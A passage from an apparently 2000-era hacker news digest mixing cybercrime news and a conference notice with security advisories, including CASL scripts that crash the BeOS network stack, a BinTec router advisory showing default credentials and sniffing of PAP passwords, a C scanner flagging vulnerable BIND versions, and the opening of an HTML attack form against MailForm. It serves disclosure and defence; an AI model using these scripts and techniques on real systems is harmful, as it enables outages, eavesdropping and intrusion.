opportunist thief at Heathrow Airport.
Military top brass admitted last night the incident was "incredibly
embarrassing".
And they said that the soldier was facing an internal disciplinary
probe. The robbery followed the loss of two security service laptops -
one from an MI5 agent at a London Tube station and one from a drunken
MI6 officer.
After those thefts were revealed exclusively by The Sun, all
Government departments were ordered to tighten precautions against
crooks out to snatch computers.
[...]
@HWA
244.0 ISN:Government suck rocks at busting computer criminals
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://news.cnet.com/news/0-1005-200-1648223.html
By The Associated Press
Special to CNET News.com
April 6, 2000, 10:05 a.m. PT
STANFORD, Calif.--Threats from cyberterrorists have become almost
routine at Oracle, the leading developer of database software.
Last month, someone in Sudan tried to blackmail the Redwood Shores,
Calif.-based company with a threat to break into its system unless it
paid an undisclosed sum of money.
A clear case for the FBI? Not at Oracle--or at hundreds of other
high-tech victims of Internet cyberstalking.
"We've notified them of a couple of threats, but we didn't expect them
to take any action," said Bill Maimone, Oracle's vice president of
server technologies. "It seems so unlikely that they'd be able to do
something."
As high-tech executives know, the Justice Department lacks the staff
to investigate and prosecute most hackers. Many companies also are
reluctant to undergo government scrutiny; they've got too many
secrets.
As a result, cybercriminals are breaking into or paralyzing Web sites
with little fear of retribution, costing the industry hundreds of
millions of dollars.
At a Stanford University Law School conference on cybercrime
yesterday, Attorney General Janet Reno pleaded for greater cooperation
between the private and public sectors.
"It seems to me that we all have a common goal--to keep the nation's
computer network secure, safe and reliable," Reno told the assembled
CEOs and prosecutors.
Many company leaders were unconvinced.
"High-tech businesses know they can't count on the Justice Department
to handle their complaints," said John Palafoutas, a senior vice
president of the American Electronics Association. "They know they
must take care of their own security."
For the past four years, the Clinton administration has asked Congress
for additional staff to prosecute computer crime. To date, the answer
has been a consistent refusal. There was just one cybercrime
prosecution for every 50 private industry complaints in 1998,
according to the latest Justice Department figures.
"We're only able to respond to a limited number of the complaints we
receive because we're starved for resources," said Associate Deputy
Attorney General John Bentivoglio.
While funding for prosecutors remains static, computer crime has
quadrupled over the past three years, according to a survey by the FBI
and San Francisco's Computer Security Institute.
Of the hacking victims--most often corporations and government
agencies--75 percent said it cost an average of $1 million per
intrusion to investigate, repair and secure their systems.
Corporations spent $7.1 billion in 1999 on security to protect
themselves against cyberattacks, and the bill could reach $17 billion
by 2003, according to Internet analysts at Aberdeen Group in Boston.
Hackers know authorities are overwhelmed.
Two months have passed with no arrests in the Feb. 8 electronic
assault that crippled Web sites at 10 major computer companies,
including Silicon Valley powerhouses eBay, Yahoo and E*Trade.
eBay, an Internet auction site with more than 4.1 million items up for
sale at any given time, fights a constant battle against hacking,
fraud and illegal deals.
"We only take the most serious matters to the FBI. They investigated a
few, but there haven't been any prosecutions," said eBay's general
counsel, Robert Chesnut. "If the government is going to come out and
vow action in these sorts of cases, they need to provide resources,
not just the promises."
Companies such as eBay and Oracle rely on the help of private
consultants to combat hackers--a decision that also helps keep their
problems from being publicized.
"Information-sharing is a risky proposition with less than clear
benefits," said Harris Miller, president of the Information Technology
Association of America. "Companies are understandably reluctant to
share sensitive proprietary information about prevention practices,
intrusions and actual crimes with either government agencies or
competitors."
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by SecurityFocus.com
@HWA
245.0 CanSecWest/core00 Canadian Security Conf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Unfortunately its out west and not here (southern Ont/Toronto) its what I
was hoping to achieve with the failed CanCon (maybe we'll try it again
with better planning this time and like oh I dunno SPONSORS? money sorta
helps heh.) anyway ...I know Dragos has promo'd this to death but here's
the details :)
April 7, 2000
CanSecWest/core00
The CanSecWest/core2000 Conference is being held May 10-12th in Vancouver,
BC, Canada. Featured speakers include Ken Williams, From Ernst and Young,
rain.forest.puppy from wiretrip.net and Fyodor, the author of nmap, from
insecure.org.
http://www.dursec.com/
CanSecWest/core00
May, 10th, 11th, 12th, 2000
Vancouver, BC, Canada.
"Every IT/Security person who can attend, should attend. CanSecWest/core00
promises to be the hardest hitting, most informative, and useful network
security event ever held in Canada." (Sounds familiar eh?)
CanSecWest is the first in the core00 series of security tutorials. It assumes
a basic understanding of computing and is targeted at IT staff and managers who
require a "crash" course on advanced computer security. If you administer
servers you -need- this knowledge to put yourself on an even footing with your
aggressors.
Our goal is to arm our attendees with the basic core set of skills to create,
defend, and audit secure computer and server installations.
This 2.5 day intensive training seminar will cover the most important modern
security issues facing e-commerce, networking, and system administration with
expert talks from some of the most noted and famous knowledgeable network
security "sensei" in the world. This is your training academy for dealing with
the network intruders trying to prey on your computer - maybe even right now.
"Find out how they break in, how to stop them, and what
they can do to try to evade you."
The core00/CanSecWest conference will run on May 10-12, 2000*. The conference
will be at the Robson Conference Center which is situated under the Vancouver
Art Gallery next to the Law Court gardens in downtown Vancouver, BC, Canada..
The seminar will be in an auditorium setting with live highspeed internet
access, and an adjoining lunch and display room. The center itself is situated
in the heart of downtown Vancouver, next to major hotels, shopping, Stanley
Park and several major transportation nexuses. Skiing or snowboarding at the
world renown Whistler resort is a 60 minute drive from downtown.
Our objective is to pack the most comprehensive overview of security into 2.5
days we can. At the conclusion of this course attendees will leave with a
strong working base of critical security knowledge that can be applied to their
day-to-day work immediately.
"The core00"
The first day of introductory training will give the attendee the background on
terminology and technology to understand and effectively learn from the
security masters speaking during the second day. The overall theme is similar
to a martial arts school, the first day is the basics and the second is notable
lectures from "Sensei".
Noted speakers include:
Ron Gula - Network Security Wizards
Famous ex-U.S. government computer security analyst, who founded Network
Security Wizards and authored the Dragon intrusion detection system. Ron
will discuss intrusion detection sensors, drawing upon his large base of
practical experience in the area.
For personal bio please click here
Ken Williams - Ernst & Young
The creator of famous hacker super-site: packetstorm.securify.com. The
infamous "tattooman" from genocide2600 now of Ernst&Young's security team
will give some pointers on NT security.
Marty Roesch - www.hiverworld.com
Author of the popular "snort" intrusion detection system and senior
software engineer on Hiverworld's "ARMOR" intrusion detection system. He
will talk about good ways to "snort" out intruders.
For personal bio please click here.
rain.forest.puppy - www.wiretrip.net
Famous security paper author - one of those "he could take over the
internet if he felt like it" kind of guys will amaze and amuse with some 0
day exploit training.
Theo DeRaadt - OpenBSD
The leader of the OpenBSD Secure operating system project will talk about
securing operating systems.
For personal bio please click here.
Fyodor - www.insecure.org
Author of the award winning Nmap Security Scanner. He also maintains the
popular Insecure.Org web site, the "Exploit World" vulnerability database,
and several seminal papers describing techniques for stealth port scanning
and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate
the use of Nmap to identify subtle security vulnerabilities in a network.
For personal bio please click here.
Max Vision - www.maxvision.net - - www.whitehats.com
Security consultant and author of the popular ArachNIDS
(www.whitehats.com) public intrusion signature database will discuss
intrusion forensics, attack fakes, attacker verification, and retaliation.
(I thought Max was in trouble with the law ...? - Ed)
Dragos Ruiu - dursec.com
Tutorial author, founder of NETSentry Technology, former MPEG and ATM
expert for HP and dursec.com founder; Dragos will be giving the first
day's training. Dragos has instructed tens of thousands of people about
digital video and high speed computer networks in highly rated HP training
courses delivered in over 60 cities world-wide. A long-time security
expert and instructor, his course material will explain this intricate
subject through approachable explanations with applications and real-world
examples that will help you apply this important knowledge to your
computers immediately.
@HWA
246.0 PSS:BeOs Network DoS
~~~~~~~~~~~~~~~~~~~~
Sourced from Packetstorm
http://packetstorm.securify.com/
Problem:
It is possible to crash the BeOS networking process.
Discussion:
The BeOS networking stack crashes when certain malformed packets
are sent to it. This document explains two such packets. The
first is an IP packet with the protocol field set to TCP. If the
IP length field is set to be shorter than 40, it will crash the
networking process on reception. Similarly, an IP packet with
protocol field set to UDP with an IP length of less than 28 also
crashes the stack. The lengths 40 and 28 correspond with the
minimum sizes of the IP and TCP headers, and the IP and UDP headers
respectively.
Because the networking stack is a seperate process in BeOS, it may
be easily restarted after it crashes.
A bug report has been filed with Be and assigned the bug number of
20000405-18674. Be has marked the bug as "Will Not Fix" with the
comment "The entire networking system will be replaced soon."
This bug was found with the help of the ISIC utility by Mike Frantzen.
Two CASL scripts which demonstrate the bug are listed below.
References:
http://www.be.com/ - Be's website. BeOS is available for download
free of charge.
http://bebugs.be.com/devbugs/ - Be's bug tracking database.
http://expert.cc.purdue.edu/~frantzen/ - The homepage of the
ISIC author.
ftp://ftp.nai.com/pub/security/casl/ - NAI's packet scripting
language CASL is available for download free of charge.
Script 1:
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy UDPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 27;
packet = [ IPH ];
ip_output(packet);
Script 2:
#!/usr/local/casl/bin/casl
#include "tcpip.casl"
#include "packets.casl"
#include "tcp.casl"
srchost = 10.0.0.1;
dsthost = 10.0.0.2;
IPH = copy TCPIP;
IPH.ip_hl = 5;
IPH.ip_src = srchost;
IPH.ip_dst = dsthost;
IPH.ip_length = 39;
packet = [ IPH ];
ip_output(packet);
@HWA
247.0 PSS: TESO Security Advisory BinTec router weakness
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sourced from Packetstorm
http://packetstorm.securify.com/
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------
TESO Security Advisory
2000/03/30
BinTec router security and privacy weakness
Summary
===================
By using SNMP brute-force-techniques for SNMP community-names one is able
to gain the management accounts passwords, which are the same as the SNMP
community names.
Additionally the MIB-Tree holds security related information which should
not be accessible through read-only/SNMP. These routers also offer services
which can be abused rather easily, like dialing out and getting full line
access via a CAPI interface, or a debugging interface which gives you all
information which is sent over the BRI-lines.
(Those services are open as default and the debugging service is barely
documented)
Systems Affected
===================
BinTec ISDN router family
tested: BIANCA/BRICK-XL
BIANCA/BRICK-XS
Tests
===================
(1) Example system setup for examples given
___________________________________________________________________________
admin Login Password/SNMP Community bitkoenig
read Login Password/SNMP Community rince
write Login Password/SNMP Community guenthi
defaults are: admin/bintec read/public and write/public
(2) Example of Read-Only SNMP output from a BinTec router
___________________________________________________________________________
syslog:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.1.12.1
[...]
enterprises.272.4.1.12.1.4.954440111.7.39 = "citykom-muenster:
local IP address is 195.202.40.124, remote is 195.202.32.121"
enterprises.272.4.1.12.1.4.954440116.7.40 =
"LOGOUT as admin from TELNET 192.168.0.100 at Thu Mar 30 18:15:16 2000"
enterprises.272.4.1.12.1.4.954440685.7.41 =
"LOGIN as admin from TELNET 192.168.0.100 at Thu Mar 30 18:24:45 2000"
enterprises.272.4.1.12.1.4.954440692.7.42 =
"citykom-muenster: outgoing connection closed, duration 583 sec, 18194
bytes received, 4934 bytes sent, 6 charging units, 0 charging amounts"
enterprises.272.4.1.12.1.4.954440692.7.43 =
"ISDN: 30.03.2000,18:15:08,18:24:52,583,18596,5306,134,124,6 Units,O,,
609910,7/0,0,0B,citykom-muenster"
[...]
capi-user-db:
bitch:~$ snmpwalk fefe.rookie.lan rince .1.3.6.1.4.1.272.4.7.8.1
enterprises.272.4.7.8.1.1.7.100.101.102.97.117.108.116.0 = "default"
/* username */
enterprises.272.4.7.8.1.2.7.100.101.102.97.117.108.116.0 = ""
/* password */
enterprises.272.4.7.8.1.6.7.100.101.102.97.117.108.116.0 = 1
/* capi access activated */
(3) Remote CAPI Server on a BinTec router
___________________________________________________________________________
fefe:> ps -elf
[...]
S 0 26 1 28 0 Jan 1 ? 00:00 00:00 vcapid
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 6000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp X11
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
(4) BrickTrace Server on a BinTec router:
___________________________________________________________________________
fefe:> ps -elf
[...]
S 0 24 1 28 0 Jan 1 ? 00:04 00:01 traced
[...]
Corresponding Port:
bitch:~# nmap -sS -O -p 7000 poor.brick.de
Starting nmap V.3.01beta by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
Interesting ports on poor.brick.de (xxx.xxx.xxx.xxx):
Port State Protocol Service
6000 open tcp afs3-fileserver
TCP Sequence Prediction: Class=random positive increments
Difficulty=1894 (Medium)
Remote operating system guess:
Bintec Brick XS SW Release 4.9.1 ISDN access router
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
(5) BrickTracing a password from an outgoing PPP connection
___________________________________________________________________________
bitch:~$ bricktrace -h2pi 1 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 1 Unit 0 Slot 2 /* Tracing the B-Channel */
[...]
020721.320 X DATA[0025]
0000: ff 03 c0 23 01 01 00 15 08 73 68 6f 6c 74 77 69 ...#.....user
0010: 73 07 72 65 74 68 6f 6f 6f .password
PPP packet protocol 0xc023 (PAP)
ID 1 PAP Authenticate-Request Peer-ID user Password password
A=FF UI
[...]
(6) Snooping an S0 Bus for telephone calls
___________________________________________________________________________
bitch:~$ bricktrace -h3 0 0 2
bricktrace: Connected to 192.168.0.1(7000)
Tracing: Channel 0 Unit 0 Slot 2 /* Tracing the D-Channel */
[...]
021096.656 R DATA[0015]
0000: 02 b3 10 1a 08 01 81 0d 18 01 89 1e 02 82 88 ...............
PD=08 Dest CR=01 SETUP ACKNOWLEDGE
IE-Element : Channel Identification :
Interface implicitly identified
Interface type S0
Channelnumber is exclusive (accept only this)
Identified Channel is not D-Channel
Selected Channel : B1-Channel
IE-Element : Progress Indicator reports
In-band information now available
[...]
021105.366 R DATA[0008]
0000: 02 b3 12 2e 08 01 81 02 ........
PD=08 Dest CR=01 CALL PROCEEDING
021108.076 R DATA[0012]
0000: 02 b3 14 2e 08 01 81 01 1e 02 82 88 ............
PD=08 Dest CR=01 ALERT
IE-Element : Progress Indicator reports
In-band information now available
[...]
021124.748 R DATA[0028]
0000: 02 b3 16 2e 08 01 81 07 29 05 00 03 1e 12 23 4c ........).....#L
0010: 0b 21 83 31 33 30 31 31 32 31 31 32 .!.130112112
PD=08 Dest CR=01 CONNECT
IE-Element : Date yy.mm.dd-hh:mm : 0.3.30-18:35:134597435
IE-Element : Unknown IE-Element 0x4c in Codeset 0
[...]
021130.282 R DATA[0045]
0000: 02 b3 1a 32 08 01 81 4d 1c 16 91 a1 13 02 02 c4 ...2...M........
0010: 37 02 01 22 30 0a a1 05 30 03 02 01 00 82 01 01 7.."0...0.......
0020: 28 0b 30 20 45 69 6e 68 65 69 74 65 6e (.0 Einheiten
PD=08 Dest CR=01 RELEASE
IE-Element : Facility
Service discriminator is supplement. application
Component tag is invoke
integer (0x2)
50231
integer (0x1)
34
sequence (0xa)
{
GetNextRequest (0x5)
{
sequence (0x3)
{
integer (0x1)
0
}
}
GetResponse (0x1)
}
IE-Element : Display : 0 Einheiten
[...]
(7) Checking line status from BinTec's httpd:
___________________________________________________________________________
[...]
Hardware Interfaces
Slot 1 Ethernet o.k.
Slot 2 ISDN S2M o.k. used 13, available 17
- - X X X X X - X -
- - X - X - - X - -
X - - - X - - X - X
[...]
now we know what to sniff:
sniffing an inbound ppp connection on line 4 slot 2:
bitch:~$ bricktrace -h2pit 4 0 2
bricktrace: Connected to aaa.bbb.ccc.ddd(7000)
Tracing: Channel 4 Unit 0 Slot 2
[...]
004419.999 X DATA[0045]
0000: 21 45 00 00 2c 39 07 40 00 3e 06 f5 cc c2 61 44 !E..,9.@.>....aD
0010: 0d c2 61 45 28 00 50 da 79 bc f8 a9 a7 02 2b c5 ..aE(.P.y.....+.
0020: 7a 60 12 44 70 3c z.Dp<
Compressed PPP packet protocol 0x21 (TCP/IP)
A=21 RNR P/F=0 N(R)=2
IP-Packet from aaa.bbb.ccc.ddd to a.b.c.d protocol 0x6
TCP-Message, sourceport 80 destinationport 55929
sequence number 3170412967
acknowledgement number 36423034
offset 6 flags ACK SYN
window 17520 checksum 0x3c9e urgent 0
[...]
004420.640 R DATA[0609]
0000: 2d 70 0e b0 43 ff 47 45 54 20 68 74 74 70 3a 2f -p..C.GET http:/
0010: 2f 63 68 61 74 33 2e 70 6c 61 79 67 72 6f 75 6e /chat3.playgroun
0020: 64 2e 64 65 2f 63 d.de/c
Compressed PPP packet protocol 0x2d (VJ Compressed TCP/IP)
A=2D I P/F=1 N(R)=3 N(S)=0
0E B0 C FF G E T h t t p : / / c h a t 3
. p l a y g r o u n d . d e / c h a t
IP-Packet from a to b protocol 0x2f
[...]
Impact
===================
(1) SNMP communities / login passwords
___________________________________________________________________________
By using standard brute-force methods, the SNMP community string, and
therefore the login's passwords can be obtained. A program doing this
is for example ADMsnmp, which has to be feeded by a wordlist. Bruteforcing
this way is quite effective, you get about 500-1000 words per minute.
(which of course depends on your and the routers connectivity) You can get
this program from [4]. Bruteforcing the passwords directly via telnet isn't
possible because the router slows down after approx. 6 tries.
(2) Using the CAPI facility
___________________________________________________________________________
Nearly any router can remotely be used as 'ISDN-Line provider' - you can
use the BRI-Lines of the router if they are not password protected.
While doing a short survey most machines we encountered were proven
to be vulnerable, so they didn't have any restrictions set. The CAPI
daemon listens on port 6000 as you can see in the 'Tests' section.
This feature can, for example be exploited by dialing expensive numbers
(0900 or 0190 [in DE] lines). You may also hide your real identity by
calling a 'call-by-call' ISP who gives you another IP you can deal with.
A (R)CAPI library for Un*x exists, which can be used for these attacks.
It is available via [5]. There is also a CAPI user interface for MS Windows,
which is called Brickware and can be obtained via [6].
Firmware before 5.1.x seems to be generally not passworded, we have not
checked 5.1.x yet.
(3) Using BrickTrace for snooping BRI-Lines
___________________________________________________________________________
You can gain information of the ISP or corporation running these routers
with open BrickTrace ports (Port 7000, default) with a program called
bricktrace, which is available via [7]. In the documentation this
port isn't even stated (!). See 'Solution' for how to turn off this port.
As you can see the whole data passing the line, so you also get the users
passwords and see what they do in the net (it is in a way like a dedicated
sniffer). Using this technique of sniffing you may also see private
information of corporations, not only restricting you to Internet
traffic but also on 'intranet' lines that use the same router, as well
as telephony networks (S0 bus).
Explanation
===================
BinTec Communications seems to rely on security by obscurity. Neither the
severity of these services, nor how to configure them are mentioned
properly in their documentation.
However, BinTec routers *can* be secured, it just seems not to be common
knowledge.
In addition to this, it seem to be quite useless to provide RCAPI
facilities on a router which is mainly used for dial-in purposes. If one
needs those abilities, encrypted management access would be appropriate.
Solution
===================
SNMP: disable (admin.biboAdmSnmpPort=0)
(admin.biboAdmSnmpTrapPort=0)
RCAPI: disable or password protect
(admin.biboAdmCapiTcpPort=0)
BrickTrace: disable
(admin.biboAdmTraceTcpPort=0)
Just manage your Router through serial line, because if your connection
gets sniffed, these services can be reactivated.
Acknowledgments
================
The bug-discovery and the demonstration are due to Stephan Holtwisch [2]
This advisory has been written by Stephan 'rookie' Holtwisch and hendy.
Contact Information
===================
The TESO crew can be reached by mailing to teso@coredump.cx.
Our web page is at [1].
References
===================
[1] TESO
http://teso.scene.at/ or https://teso.scene.at/
[2] Stephan Holtwisch
sholtwis@muenster.de
[3] BinTec Communications
http://www.bintec.de
[4] ADMsnmp - bruteforce SNMP communities
ftp://adm.freelsd.net/pub/ADM/ADMsnmp.0.1.tgz
[5] libcapi for RCAPI (Unix)
ftp://ftp.bintec.de/pub/brick/libcapi/
[6] BrickWare (CAPI software for windows)
ftp://ftp.bintec.de/pub/brick/brickware/
[7] BrickTrace (BRI-Line snooping)
ftp://ftp.bintec.de/pub/brick/unixtool/
Disclaimer
===================
This advisory does not claim to be complete or to be usable for any
purpose. Especially information on the vulnerable systems may be
inaccurate or wrong. The supplied information is not to be used for
malicious purposes, but for educational purposes only.
This advisory is free for open distribution in unmodified form.
Articles that are based on information from this advisory should include
at least links [1] and [2].
- ------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE45biacZZ+BjKdwjcRAlQaAJ9ozxk8JlFuEZSA0br4u+d3+CbfgACgjLHx
fDJT2mFXDx4xRzzE7Da7pD8=
=d2XM
-----END PGP SIGNATURE-----
@HWA
248.0 b0f: namedscan.c
~~~~~~~~~~~~~~~~
/*********************************************/
/* namedscan.c will check the named version */
/* of a host, and tell you if its a vuln version */
/***********************************************/
/* buffer0verfl0w security */
/*******************************/
/* coded by eth0 from b0f */
/* [http://www.b0f.com] */
/*******************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <time.h>
#include <stdarg.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
int lookup_host(struct sockaddr_in *ra, char *hn, unsigned short rp);
void probe_bind(struct sockaddr_in ra);
int talk(int sd, char *pkt, int pktl, char opc);
int make_keypkt(char *pktbuf, char opc);
void print_ver(char *host, int vul, char *buf);
void handle_alarm(int signum);
int
lookup_host(ra, hn, rp)
struct sockaddr_in *ra;
char *hn;
unsigned short rp;
{
struct hostent *he;
ra->sin_family = AF_INET;
ra->sin_port = htons(rp);
if ((ra->sin_addr.s_addr = inet_addr(hn)) != -1)
return 1;
if ((he = gethostbyname(hn)) != (struct hostent *)NULL)
{
memcpy(&ra->sin_addr.s_addr, he->h_addr, 4);
return 1;
}
herror("Unable to resolve hostname");
return 0;
}
void
probe_bind(ra)
struct sockaddr_in ra;
{
int sd;
char iquery[512], vquery[512], rname[256];
struct hostent *he;
HEADER *dh = (HEADER *)iquery;
memset(vquery, 0, sizeof(vquery));
memset(iquery, 0, sizeof(iquery));
if (((sd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) ||
(connect(sd, (struct sockaddr *)&ra, sizeof(ra)) == -1))
{
perror("Unable to connect");
if (sd != -1)
close(sd);
return;
}
if ((he = gethostbyaddr((char *)&ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *)NULL)
sprintf(rname, "%s", inet_ntoa(ra.sin_addr));
else
strncpy(rname, he->h_name, sizeof(rname));
if (!talk(sd, iquery, sizeof(iquery), IQUERY))
return;
if (!talk(sd, vquery, sizeof(vquery), QUERY))
return;
close(sd);
/* if dh->rcode == 0, then our iquery request was answered and the remote server
supports iquery */
print_ver(rname, dh->rcode == 0, vquery);
}
/*
* write our packet from pkt, wait for a response and put it in pkt.
* if the alarm goes off or the read fails, we print error
* and return 0. otherwise, our response packet is in pkt and we return 1.
*/
int
talk(sd, pkt, pktl, opc)
int sd, pktl;
char *pkt, opc;
{
int pktlen;
pktlen = make_keypkt(pkt, opc);
if (!write(sd, pkt, pktlen))
{
perror("write failed");
close(sd);
return 0;
}
/* #ifdef DEBUG
printf("write() success\n");
#endif */
siginterrupt(SIGALRM, 1);
signal(SIGALRM, handle_alarm);
alarm(3);
pktlen = read(sd, pkt, pktl);
if (pktlen <= 0)
{
if (errno == EINTR)
errno = ETIMEDOUT;
perror("<[Namedscan]>:([ Read Failed *shrugs* ]) -> read failed");
close(sd);
return 0;
}
/* #ifdef DEBUG
printf("read success\n");
#endif */
alarm(0);
return 1;
}
int
make_keypkt(pktbuf, opc)
char *pktbuf;
char opc;
{
HEADER *dnsh;
char *ptr = pktbuf;
int pktlen = 0;
dnsh = (HEADER *) ptr;
/* fill out the parts of the DNS header that aren't 0 */
dnsh->id = htons(rand() % 65535);
dnsh->opcode = opc;
dnsh->rd = 1;
dnsh->ra = 1;
/* one answer for IQUERY, one question for QUERY */
if (opc == IQUERY)
dnsh->ancount = htons(1);
else if (opc == QUERY)
dnsh->qdcount = htons(1);
pktlen += sizeof(HEADER);
ptr += sizeof(HEADER);
/* we have to make a QUERY, fill out the question section */
if (opc == QUERY)
{
/* version.bind. == elite */
char qstr[] = "\007version\004bind\000";
int qlen = strlen(qstr) + 1;
memcpy(ptr, qstr, qlen);
ptr += qlen;
pktlen += qlen;
PUTSHORT(T_TXT, ptr);
PUTSHORT(C_CHAOS, ptr);
pktlen += sizeof(short) * 2;
}
/* add a resource record for the inverse query */
else if (opc == IQUERY)
{
unsigned long addr = inet_addr("1.2.3.4");
unsigned long ttl = 31337;
unsigned short addrlen = 4;
*(ptr++) = '\0';
pktlen++;
PUTSHORT(T_A, ptr);
PUTSHORT(C_IN, ptr);
PUTLONG(ttl, ptr);
PUTSHORT(addrlen, ptr);
PUTLONG(addr, ptr);
pktlen += (sizeof(short) * 3) + (sizeof(long) * 2);
}
/* if we're debugging, show what we just made */
/* #ifdef DEBUG
print_dnspkt(pktbuf, pktbuf + pktlen);
#endif */
return pktlen;
}
int checknamed(char *verstr)
{
if(strstr(verstr,"4.9.5")||strstr(verstr,"4.9.6-REL") || strstr(verstr,"4.9.5-REL")||strstr(verstr,"4.9.5-P1")||strstr(verstr,
"8.1-REL")
||strstr(verstr,"8.1.1")||strstr(verstr,"8.2")||strstr(verstr,"8.2.1"))
{
if(strstr(verstr,"8.2.2-P5")||strstr(verstr,"8.2.2-P4")||strstr(verstr,"8.2.2-P3")||strstr(verstr,"8.2.2-P2")){printf("<[Name
d Version [%s] ]>\n",verstr);return(0);}
printf("<[Named version [%s]]> Possible Vuln\n",verstr);
}
else
{
printf("<[No named vulns found. version [%s]]>\n",verstr);
}
return(0);
}
void
print_ver(host, vul, buf)
char *host, *buf;
int vul;
{
HEADER *dnsh = (HEADER *)buf;
char *ptr, *verstr;
int len;
if (dnsh->rcode != 0)
{
/* printf("%s's named that %s iquery does not respond to version.bind.\n", host, vul ? "supports" : "errors on"); */
return;
}
/* So we actually have a response. Lets skip the crap, starting with the header */
ptr = (buf + sizeof(HEADER));
/* then the question section domain name. */
while (*ptr != '\0')
ptr++;
/* then the trailing null and the type/class of the question */
ptr += 1 + (sizeof(short) * 2);
/* now we skip the answer section domain name. (should be the same as the question) */
while (*ptr != '\0')
ptr++;
/* don't forget the trailing null, type, class, and time to live. */
ptr += 1 + (sizeof(long) + (sizeof(short) * 2));
/* Here we are at the resource record data length, extract it */
GETSHORT(len, ptr);
/* avoid the need to decompress the string (treat it as one) */
ptr++;
/* allocate space for and copy the version response txt */
verstr = (char *)malloc(len);
memset(verstr, 0, len);
memcpy(verstr, ptr, len-1);
/* run through the vesion string and replace non-printable and non-whitespace characters
with a '.' */
for (ptr = verstr; ptr - verstr != len - 1; ptr++)
if (!isprint(*ptr) && !isspace(*ptr))
*ptr = '.';
/* print the version and iquery support status, woo hoo */
#ifdef debugz
printf("%s's named that %s iquery is version: %s\n", host, vul ? "supports" : "errors on", verstr);
#endif
checknamed(verstr);
}
/*
* handle the alarm signal by resetting the alarm timer and
* the signal handler for SIGALRM. This stuff probably isn't needed,
* but I did it anyway. It's good for debugging, ran into some problems with
* alarm() not doing its job.
*/
void
handle_alarm(signum)
int signum;
{
alarm(0);
signal(SIGALRM, SIG_DFL);
/* #ifdef DEBUG
printf("recieved alarm\n");
#endif */
}
int main(int argc, char *argv[])
{
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
int sock;
struct sockaddr_in ra;
if(argv[1]==NULL)
{
printf("coded by eth0 [b0f]\n");
printf("Usage: %s [host]\n",argv[0]);
exit(1);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
if (!lookup_host(&ra, argv[1], NAMESERVER_PORT))
return;
srand(time(NULL));
probe_bind(ra);
return(0);
}
@HWA
249.0 PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sourced from Packetstorm
http://packetstorm.securify.com/
Advisory: MailForm v1.91 for Windows 95 and NT 4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================
Do not save this with any editor, or _vital_ formatting may be lost.
Disclaimer:
=============
This document is intended as an advisory, and I cannot be held
accountable for its misuse. The reader assumes all responsibility for
his/her use of this information.
Summary:
==========
Date released: 07/04/2000 (dd/mm/yyyy).
Risk: denial of service, reading of private files, appending to
private files, full system compromise if the afforementioned risks
are leveraged properly.
Vulnerability found by: Chopsui-cide
Vulnerable: MailForm v1.91, probably prior versions (not tested).
Immune: ?
MailForm allows potentially dangerous parameters to be specified by
anyone who can execute it. These allow for reading and writing of
files on the system on which MailForm resides.
Details:
==========
Problem fields:
_1_TextLog -
_1_HTMLLog - these two are the ones used to write to files.
_1_MailTemplate - this is what is used to retrieve files.
_1_INIFile - possibly dangerous, but not discussed here.
_1_MailServer - we can just change this to our own address.
_1_MailTo - we don't even need to bother with this.
It's fairly obvious where the problem lies here. We can specify any
file to send + the POP server to send it to. The con\con bug may also
be used to bring down the entire system. Template files will be cut
off at the first null character, so retrieving of binaries is not
practical. Trying to retrieve certain files will cause MailForm to
crash.
A very crude example of how to run code on the remote system is
provided in the last section of this advisory.
Implementation: web interface
===============================
I have constructed some html that allows an attacker to download and
append to files on any remote system running MailForm (cut where it
says [snip], obviously):
[snip]
<html>
<title>Web interface for MailForm vulnerabilities.</title>
</head>
Do not be alarmed by any "Form submission failed" errors. These are
normal. You will need to modify the form tags in this page to
correspond to the host being attacked.<br>
<br>
Download file:<br>
<body bgcolor="#FFFFFF">
<form method="POST" action="http://localhost/cgi-bin/mailform.exe">
